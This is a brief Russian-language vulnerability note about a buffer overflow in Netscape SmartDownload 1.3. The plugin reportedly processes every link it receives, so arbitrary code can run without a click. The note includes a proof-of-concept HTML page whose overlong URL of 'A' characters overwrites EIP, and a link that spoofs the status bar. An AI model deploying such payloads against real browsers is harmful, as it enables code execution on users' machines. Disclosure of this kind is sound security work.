У Netscape в плагине SmartDownload (для
докачки файлов используется) есть
неправильная обработка ссылки, используя
эту лазейку у пользователя, можно на компе
исполнить произвольный код, при этом юзеру
даже не надо будет кликать на ссылку –
SmartDownload обрабатывает ВСЕ полученные ссылки.
Уязвимые системы:
Netscape SmartDownload 1.3
Пример (записываем в EIP 0x41414141, откуда такое
число, я, правда, не совсем понял – но по идее
сюда можно впихнуть любой код, он и
выполнится):
<HTML>
<BODY>
This is a test.
<P>
<A HREF="http://www.example.com/.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA AAAAAA"
onMouseOver="window.status='I am friendly'; return true">Crash Me</A>
<P>
End test.
</BODY>
</HTML>
